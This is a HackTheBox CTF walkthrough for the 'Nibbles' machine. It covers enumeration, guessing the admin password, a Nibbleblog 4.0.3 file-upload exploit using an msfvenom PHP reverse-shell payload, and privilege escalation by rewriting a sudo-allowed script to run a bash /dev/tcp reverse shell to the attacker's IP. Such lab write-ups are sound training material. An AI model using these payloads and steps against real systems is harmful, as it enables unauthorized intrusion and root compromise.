HackTheBox Nibbles Writeup

Enjoy reading my HTB Nibbles Writeup

HackTheBox Nibbles Walkthrough

HackTheBox is a popular service that offers CTF-like machines to let infosec professionals improve their current skills or learn new ones. HTB Nibbles is a machine recommended if you want to take the OSCP exam.

Information Gathering

Let's begin with a nmap scan against the target machine:

sudo nmap -p 1-5000 -sC -sV -T4 -v 10.10.10.75

Two services are running:

So, we know a web service is running and the running operating system is Linux (probably Ubuntu).

Browsing the website we are faced with "Hello World!" and nothing more. Taking a look at the source code of the page we see an HTML comment:

0<!-- /nibbleblog/ directory. Nothing interesting here! -->

Before checking the directory, let's start gobuster as there might be more:

gobuster dir -u http://10.10.10.75/ -x php -w /Lists/directory-list.txt

Taking a look at the source code of /nibbleblog/ we can see that there is a subdirectory called themes and one called admin. When browsing /admin we are able to get the index of the directory which might be a sign for an LFI.

I tried attacking with an LFI using burpsuite and doing it manually but had no success.

Mext, let's enumerate the nibbleblog directory using gobuster:

gobuster dir -u "http://10.10.10.75/nibbleblog/" -x php -w /Lists/directory-list.txt

This reveals a login page on /nibbleblog/admin.php, I intercepted the request while logging in using burpsuite and set it to Intruder in order to brute-force the admin password. Unfortunately, there was some sort of fail2ban software installed so it took some time.

With the credentials admin:nibbles you get redirected to admin.php?controller=dashboard&action=view.

Gaining a reverse shell

On the settings page we see that Nibbleblog version 4.0.3 is being used, time to look if there's an exploit for this version.

Luckily, version 4.0.3 is vulnerable to arbitrary file upload:

I am going to exploit this system without metasploit by abusing the My_Image plugin. For that I first created a php payload using msfvenom: msfvenom -p php/reverse_php LHOST=10.10.16.180 LPORT=4545 -f raw > shell.php

Then I uploaded the shell by navigating to Plugins, My Image, Configure (ignore all the errors). During enumeration, gobuster found a directory called "content", by navigating to this directory we are able to see the index of the page and find the directory where our shell got uploaded to (/content/private/plugins/my_image/shell.php).

Browse the file to get a session in our netcat listener as nibbler. Even though the shell is very unstable and can't be stabilized that easily, it's enough to navigate to /home/nibbler and read the user flag.

Privilege escalation

Taking a look at our permissions with sudo -l we can see that nibbler is allowed to execute /home/nibbler/personal/stuff/monitor.sh as root without entering a password. Let's navigate to /home/nibbler, in there we have the user flag, a file called personal.zip but no personal directory. Because of that, extract the archive using: unzip personal.zip.

In /personal/stuff we now have our monitor script which I rewrote in order to spawn another reverse shell with root privileges:

0echo "#!/bin/bash" > monitor.sh
1echo "bash -i >& /dev/tcp/10.10.16.180/8899 0>&1" >> monitor.sh

Then I executed it with sudo /home/nibbler/personal/stuff/monitor.sh and got my shell as root.

Simply cat root.txt and you are done with pwning this machine.

Tags:

htb, hackthebox, nibbles